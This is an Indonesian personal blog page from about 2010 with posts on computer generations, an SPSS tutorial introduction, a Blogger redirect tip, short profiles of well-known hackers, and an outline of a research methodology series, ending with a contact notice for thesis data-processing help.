Pada masa sekarang, kita mengenal perjalanan IBM compatible dengan pemakaian CPU: IBM PC/486, Pentium, Pentium II, Pentium III, Pentium IV (Serial dari CPU buatan Intel). Juga kita kenal AMD k6, Athlon, dsb. Ini semua masuk dalam golongan komputer generasi keempat.
Seiring dengan menjamurnya penggunaan komputer di tempat kerja, cara-cara baru untuk menggali potensial terus dikembangkan. Seiring dengan bertambah kuatnya suatu komputer kecil, komputer-komputer tersebut dapat dihubungkan secara bersamaan dalam suatu jaringan untuk saling berbagi memori, piranti lunak, informasi, dan juga untuk dapat saling berkomunikasi satu dengan yang lainnya. Jaringan komputer memungkinkan komputer tunggal untuk membentuk kerjasama elektronik untuk menyelesaikan suatu proses tugas. Dengan menggunakan perkabelan langsung (disebut juga Local Area Network atau LAN), atau kabel telepon, jaringan ini dapat berkembang menjadi sangat besar.
[] Generasi Kelima
Mendefinisikan komputer generasi kelima menjadi cukup sulit karena tahap ini masih sangat muda. Contoh imajinatif komputer generasi kelima adalah komputer fiksi HAL9000 dari novel karya Arthur C. Clarke berjudul 2001: Space Odyssey. HAL menampilkan seluruh fungsi yang diinginkan dari sebuah komputer generasi kelima. Dengan kecerdasan buatan (artificial intelligence atau AI), HAL dapat cukup memiliki nalar untuk melakukan percapakan dengan manusia, menggunakan masukan visual, dan belajar dari pengalamannya sendiri.
Walaupun mungkin realisasi HAL9000 masih jauh dari kenyataan, banyak fungsi-fungsi yang dimilikinya sudah terwujud. Beberapa komputer dapat menerima instruksi secara lisan dan mampu meniru nalar manusia. Kemampuan untuk menterjemahkan bahasa asing juga menjadi mungkin. Fasilitas ini tampak sederhana. Namun fasilitas tersebut menjadi jauh lebih rumit dari yang diduga ketika programmer menyadari bahwa pengertia manusia sangat bergantung pada konteks dan pengertian ketimbang sekedar menterjemahkan kata-kata secara langsung.
Banyak kemajuan di bidang desain komputer dan teknologi semkain memungkinkan pembuatan komputer generasi kelima. Dua kemajuan rekayasa yang terutama adalah kemampuan pemrosesan paralel, yang akan menggantikan model non Neumann. Model non Neumann akan digantikan dengan sistem yang mampu mengkoordinasikan banyak CPU untuk bekerja secara serempak. Kemajuan lain adalah teknologi superkonduktor yang memungkinkan aliran elektrik tanpa ada hambatan apapun, yang nantinya dapat mempercepat kecepatan informasi.
Jepang adalah negara yang terkenal dalam sosialisasi jargon dan proyek komputer generasi kelima. Lembaga ICOT (Institute for new Computer Technology) juga dibentuk untuk merealisasikannya. Banyak kabar yang menyatakan bahwa proyek ini telah gagal, namun beberapa informasi lain bahwa keberhasilan proyek komputer generasi kelima ini akan membawa perubahan baru paradigma komputerisasi di dunia.
Perkembangan lebih lanjut pada generasi sekarang ini lebih banyak difokuskan pada pengembangan prosessor.
oK teman-teman, saran saya biasakan kita tidak hanya memakai suatu barang tetapi kita juga harus mengetahui seluk beluk dari barang yang kita pakai.

Selengkapnya...

Sabtu, 09 Januari 2010

Tutorial SPSS

Belajar SPSS
by thoeght

Salah satu program pengolah data statistik yang terkenal adalah SPSS. Program SPSS (dengan versi terbarunya SPSS 17) merupakan program statistik yang paling populer dan paling banyak dipakai di seluruh dunia. Sejumlah kalangan menggunakannya untuk berbagai keperluan seperti riset pasar maupun untuk penyelesaian tugas penelitian semacam skripsi, tesis, disertasi, dan sebagainya. Dalam blog ini akan saya berikan tutorial baik untuk SPSS maupun SPS
SPSS (Statistical Package for the Social Sciences) merupakan salah satu program yang membantu kita dalam mengolah data penelitian.
Perbedaan antara SPS dan SPSS yang akan saya berikan pembelajarannya di blog ini adalah:
1. SPS dalam hasil dari proses pengolahan data, hasilnya telah dapat kita ketahui langsung tanpa harus membandingkan hasil pengolahan data kita dengan table penelitian sehingga dalam pembacaan hasil penelitian lebih mudah
2. pengoperasiannya lebih mudah karena menggunakan bahasa Indonesia dan tidak perlu memiliki pengetahuan tentang statistika yang penting bisa baca
3. untuk SPS kita harus membeli program karena hasil dari printout tidak bisa dirubah seperti halnya pada SPSS. Dalam program SPS menggunakan DOS jadi untuk mencetak hasil pengolahan data kita harus memiliki print yang support pada program DOS (seri LX, cannon seri 300 ke bawah)
agar teman-teman bisa menggunakan SPSS baik itu versi dahulu maupun yang lama, teman-teman wajib dan wajib tuk memiliki pengetahuan mengenai statistika. Teman-teman dapat belajar di blog ini yang terdiri dari 10 tahap. Saya jamin 100% bisa teman-teman bisa menguasai 10 tahapan dalam belajar pengolahan data penelitian dalam blog ini maka teman-teman sudah bisa membuka konsultasi pengolahan data.
OK. Sekarang kita akan belajar mengenai program SPSS. Yang saya gunakan sebagai dasar adalah SPSS 16. perbedaannya tidaklah jauh dari versi terbaru yaitu versi 17 ataupun versi yang lama 10, 10.5, 11, 11.5 dll.
Yang penting kita tahu cara menggunakan atau menjalankan program dan sekaligus membaca hasil dari pengolahan data yang kita lakukan.
Dalam belajar penggunaan program SPSS akan saya bagi mejadi beberapa bagian jadi teman-teman yang pingin belajar SPSS bisa dengan lancar dan terperinci dalam proses belajarnya.
Teman-teman harus bersabar dalam belajar, dan saya akan berusaha untuk cepat mempostingan mengenai Belajar SPSS. Mohon pengertian teman-teman smua karena saya berusaha agar apa yang saya postingkan nanti akan dengan mudah dikuasasi dan dimengerti oleh teman-teman.
trims


Selengkapnya...

Selasa, 05 Januari 2010

TIP DAN TRIK

REDIRECT to MOVE WEBSITE
With announcement notice for visitor

by thoeght
recently, I was very confused to make a redirect in my blog turned into a new blog. oh yes my friends before I apologize if I change the url and the name of my blog. I do this because they want more make appearances blogs become easier and convenient for my friends.
I told her that Blog "Thoeght-Family" and "THOE-THOEGHT" is the same. only the address and a different appearance, hopefully this does not make friends and party blogger.com confused.
ok now I will continue concerning the discussion of redirect. redirect is one of the pension that is used to turn you the page or website / blog to the page or our other websites.
had a lot of fellow bloggers or friends who provide information about the redirect. they have given the steps in the making. but in this discussion I will redirect more specific to redirect it to move one of our sister site to our other website with an announcement notice to visitors that they are redirected to our new website.
or example my friends can see a way to open my old blog Thoeght-Family. will be transferred to my new blog. example click here
in making this redirect, we use a meta redirect
very easy step. Just follow these steps to make friends.
  • log into blogger.com with ID own friends
  • ayout menu, then click edit html do not forget to check the Expand Widget Templates
Copy to remember all my friend's template code and paste in notepad and then save, to back up your data. This is intended in the event of an error in the template that we have the brain-tweaking, we still have to back up data.
  • search <head> code (located at the top) to make it easier for my friends in the search for words in html template friends please click on the Edit menu on your browser's menu bar, then click Find (on this page and write )..., words to search and then click the Find Next button, it will automatically be brought to code. click again next to the word search friends found
  • Put this code right under code.



http://contoh.blogspot.com change the address or the page you want your friends to go.
friends can set how long it took to divert to the blog / website / new pages by replacing the number 5 with the desired number. 5 digits in seconds. suggestions do not be too long because the visitors will get bored because they are too long too wait.
these steps could have been used to move the address or page to our new address. but our old pages will appear as the beginning. This makes me confused. this is not what I want. the problem is how to appear was the writing that describe the information to the visitor that the visitors were moved to the blog / website / pages that we want.
curious is not, let us continue the discussion
  • Cary <body> code. This is the most important and dangerous to our html, because all the existing content on the blog / website / pages we will be lost. do not worry remember we have our html file backup so html files will not be lost and we do not create a blog / html / website.
remove all the code under <body> code up above code </body>.
then write the words you want your friends to appear as a notification to visitors. friends can modify both the words with the word walk, blinking, capitalization or the other according to the wishes of friends.
  • last step is to save our edits. to see the results before we save the edits click preview and wait appears all. if it is in conformity with its desires and then save it.
hopefully, this article can help my friends all.
I am not good at self in english but I want to learn english
send criticism and suggestions both in terms of writing the English language or another. good luck

Selengkapnya...

Sabtu, 02 Januari 2010

Artikel PENGETAHUAN

Mengenal Hacker Internasonal dan Indonesia
by thoegh

Hacker adalah orang yang mempelajari, menganalisa, dan selanjutnya bila menginginkan, bisa membuat, memodifikasi, atau bahkan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya , terutama keamanan.

Berikut beberapa profile 14 Hacker Terbaik Dunia untuk saat ini
1. Kevin Mitnick
Kevin adalah hacker pertama yang wajahnya terpampang dalam
poster “FBI Most Wanted”.
Kevin juga seorang “Master of Deception” dan telah menulis buku yang berjudul “The Art of Deception”. Buku ini menjelaskan berbagai teknik social engineering untuk mendapatkan akses ke dalam sistem.
2. Linus Torvalds
Seorang hacker sejati, mengembangkan sistem operasi Linux yang merupakan gabungan dari “LINUS MINIX”.Sistem operasi Linux telah menjadi sistem operasi “stkamur” hacker.Bersama Richard Stallman dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan programmer, developper dan hacker seluruh dunia untuk mengembangkan kernel Linux.
3. John Draper
Penemu nada tunggal 2600 Herz menggunakan peluit plastik yang merupakan hadiah dari kotak sereal.Merupakan pelopor penggunaan nada 2600 Hz dan dikenal sebagai Phone Phreaker (Phreaker, baca: frieker)
Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan telepon gratis.
Pada pengembangannya, nada 2600 Hz tidak lagi dibuat dengan peluit plastik, melainkan menggunakan alat yang disebut “Blue Box”.
4. Mark Abene
Sebagai salah seorang “Master of Deception” phiber optik, menginspirasikan ribuan remaja untuk mempelajari sistem internal telepon negara. Phiber optik juga dinobatkan sebagai salah seorang dari 100 orang jenius oleh New York Magazine.
Menggunakan komputer Apple , Timex Sinclair dan Commodore 64.
Komputer pertamanya adalah Radio Shack TRS-80 (trash-80).
5. Robert Morris
Seorang anak dari ilmuwan National Computer Security Center yang merupakan bagian dari National Security Agencies (NSA).
Pertama kali menulis Internet Worm yang begitu momental pada tahun 1988.
Meng-infeksi ribuan komputer yang terhubung dalam jaringan.
6. Richard Stallman
Salah seorang “Old School Hacker”, bekerja pada lab Artificial Intelligence MIT.
Merasa terganggu oleh software komersial dan dan hak cipta pribadi.
Akhirnya mendirikan GNU (baca: guhNew) yang merupakan singkatan dari GNU NOT UNIX. Menggunakan komputer pertama sekali pada tahun 1969 di IBM New York Scintific Center saat berumur 16 tahun.
7. Kevin Poulsen
Melakukan penipuan digital terhadap stasiun radio KIIS-FM, memastikan bahwa ia adalah penelpon ke 102 dan memenangkan porsche 944 S2.
8. Ian Murphy
Ian Muphy bersama 3 orang rekannya, melakukan hacking ke dalam komputer AT&T dan menggubah seting jam internal-nya.Hal ini mengakibatkan masyarakat pengguna telfon mendapatkan diskon “tengah malam” pada saat sore hari, dan yang telah menunggu hingga tengah malam harus membayar dengan tagihan yang tinggi.
9. Vladimir Levin
Lulusan St. Petersburg Tekhnologichesky University. Menipu komputer CitiBank dan meraup keuntungan 10 juta dollar. Ditangkap Interpol di Heathrow Airport pada tahun 1995
10. Steve Wozniak
Membangun komputer Apple dan menggunakan “blue box” untuk kepentingan sendiri.
11. Tsutomu Shimomura
Berhasil menangkap jejak Kevin Mitnick.
12. Dennis Ritchie dan Ken Thomson
Dennis Ritchie adalah seorang penulis bahasa C, bersama Ken Thomson menulis sistem operasi UNIX yang elegan.
13. Eric Steven Raymond
Lebih dikenal dengan sebutan Bapak hacker. Seorang hacktivist dan pelopor opensource movement. Menulis banyak panduan hacking, salah satunya adalah: “How To Become A Hacker” dan “The new hacker’s Dictionary”.
Begitu fenomenal dan dikenal oleh seluruh masyarakat hacking dunia.
Menurut Eric, “dunia mempunyai banyak persoalan menarik dan menanti untuk dipecahkan”.
14. Johan Helsingius
Mengoperasikan anonymous remailer paling populer didunia.

Hacker dari negeri sendiri diantaranya :
Susanto, juga dikenal sebagai S'to, tokoh dunia hacker Indonesia. Penulis buku hacking. Pembina dan moderator mailing list hacker & network security terbesar jasakom-perjuangan@yahoogroups.co
Dani Firmansyah, juga dikenal sebagai xnuxer, seorang hacker Indonesia. Pernah membobol Web KPU & dipenjara selama beberapa bulan. Aktif menyebarkan ilmu untuk menambah wawasan bangsa dalam bidang network security
Rummy Taulu (cyberbug atau cbug)
Bila ada pembobol yang bisa digolongkan sebagai aktivis, Rummy Taulu adalah
salah satunya. Senior di Kecoak Elektronik?kelompok pembobol situs?ini
acap melakukan aksi pembobolan bernuansa politis bersama rekan-rekannya
selama rezim Soeharto masih berkuasa. Situs Markas Besar Kepolisian RI,
Badan Pemeriksa Keuangan, dan Golkar mereka acak-acak. Di tampilan
situs yang telah porak-poranda, mereka mencantumkan sejumlah tuntutan,
antara lain penurunan harga, pelepasan tahanan politik, dan penggantian
presiden
Wenas Agusetiawan (hC- atau hantucrew)
Setahun lalu, Singapura digegerkan aksi pemuda asal Malang ini. Wenas?saat itu
berusia 16 tahun?ditangkap aparat yang berhasil mengendus jejaknya
seusai ia membobol situs Data Storage Institute, Singapura. Selama
persidangan, beberapa teman Wenas yang tergabung dalam Antihackerlink
membobol tiga situs dengan domain .sg atau Singapura sebagai tanda
protes. Wenas sendiri, karena masih remaja, akhirnya tak dikenai
hukuman badan, tapi ia harus membayar denda senilai Rp 75 juta
Iwan Dharmawan (chikebum)
"prestasi" salah satu pentolan kelompok
Antihackerlink ini cukup mengagumkan. Ia pernah membobol aneka server
dengan domain .au, .id, .kr, .tw, .edu, dan .com. Selain Toserba
Matahari, Perusahaan Listrik Negara pernah menjadi korbannya. Sebelum
beraksi, ia mengirim peringatan kepada pengelola situs yang ia bidik
agar menambal lubang kelemahan sebelum dibobol orang. "Bila peringatan
ini diabaikan, ya sudah, saya bobol sendiri untuk pelajaran," tulis
chikebum, yang dilengkapi emoticon J alias senyum lebar


teman-teman berminat untuk mencantumkan namanya di artikel ini????? buktikan dulu dan ingat membuktikannya dengan cara yang halal ya.


Selengkapnya...

Jumat, 01 Januari 2010

ARTIKEL PENELITIAN

BELAJAR TENTANG PENELITIAN
by thoeght

Ok teman-teman saatnya saya akan memberikan informasi ilmu pengetahuan kepada teman-teman semua terutama dalam hal penelitian dan olah data.
Sesuai dengan maksud dari pembuatan blog ini yaitu untuk membantu teman-teman dalam melakukan penelitian, maka dalam pembahasan atau ulasan dalam artikel penelitian akan saya bagi menjadi beberapa tahap agar semua dapat lebih jelas dan terperinci.
Dengan adanya “pemberian informasi” istilahnya di dunia pendidikan akan membantu teman-teman dalam melakukan penelitian untuk mendapatkan selembar ijazah bagi yang menempuh pendidikan di S1 maupun S2 dan seterusnya. Semoga memberikan yang terbaik bagi teman-teman.
Adapun tahapan dalam pemberian informasi PENELITIAN adalah :
Tahap 1
akan diuraikan tentang dasar-dasar dari metodologi penelitian yang terdidi dari pengertian statistic dan penelitian itu sendiri, Variabel penelitian, Paradigma Penelitian, Ini merupakan dasar dari metodelogi penelitian yang harus dipahami oleh seorang peneliti sebelum melakukan sebuah riset penelitian
Tahap 2
mengenai konsep dasar Statistis Deskriptif
Tahap 3
akan membahas mengenai populasi dan sample penelitian serta cara/metode dalam pengambilan sample penelitian
Tahap 4
berisikan tentang instrument penelitian baik itu bentuk maupun penyusunannya dan pengujian instrument penelitian
Tahap 5
berisikan tentang konsep dasar pengajuan hipotesis yang akan dibagi menjadi 2 bagian yaitu pengujian hipotesis deskriptif, hipotesis komparatif
Tahap 6
berisikan mengenai berbagai macam pengujian hipotesis penelitian
Tahap 7
berisikan tentang perhitungan uji normalitas data, uji linieritas data dan uji multikolinieritas
Tahap 8
akan diuraikan penjelasan untuk tabel penelitian
Tahap 9
akan diuraikan mengenai pembacaan hasil pengolahan data
Tahap 10
merupakan tahap terakhir yaitu penjelasan mengenai tahapan dalam penulisan laporan ataupun format dalam penulisan laporan.
Dari ke sepuluh tahapan tersebut diharapkan nantinya teman-teman semua bisa melakukan suatu penelitian dan membantu dalam penelitian terutama dalam penyusunan skripsi
Maka dari itu , saya harap teman-teman untuk terus mengikuti penulisan artikel dalam blog ini. Karena setiap tahapan akan muncul secara satu persatu.
Tetap trus tuk membagi ilmu kepada siapa saja


Selengkapnya...

INFORMASI

Bagi yang membutuhkan bantuan Olah Data Penelitian, Skripsi, Tesis Makalah, Modul Pembelajaran dan Materi Pembelajaran Power Point hubungi kami di +06281915544049 atau kirim email ke Nick.thoeght@yahoo.co.id atau thoeght@gmail.com

Article Computer

This page is intended to explore different things about computers like computer software, and hardware Programes. with the knowledge that we will be able to take care of our computers properly

Article Education

this page is contain about anything of education. such of article education, method education,etc if you search anything about education, you will get in this page and if you have idea, discussion of education i hope you tell me and we are can improve knowledge and thinking

Artikel Olahraga

This article presents the various fields of knowledge, especially in sports such as game rules, history, news or sports information, and others. our knowledge will increase knowledge of sport that will develop. we will be able to know the development of sport in both Indonesia and foreign countries

Artikel Pengetahuan

Containing various kinds of knowledge both of a general or specific nature.
all obtained from various sources and is expected to broaden dapt science especially in the era of 20th century. with extensive knowledge we will be able to follow developments in science and technology in modern times it is necessary

Artikel Penelitian

Special pages to research whether the research instrument making, if the research data. This is made to help all in terms of research, especially research thesis, paper. in this article devoted to the processing of research data using SPSS or SPS, research methodology, etc.

Tips and Triks

Specially created to help my friends in terms of managing blogs, websites and calling a problem with a computer or laptop, and so comfortable in the rounds in cyberspace. of this article we will also supply to now the virtual world will be safe from a variety of things
 

Copyright © 2009 by "THOE-THOEGHT"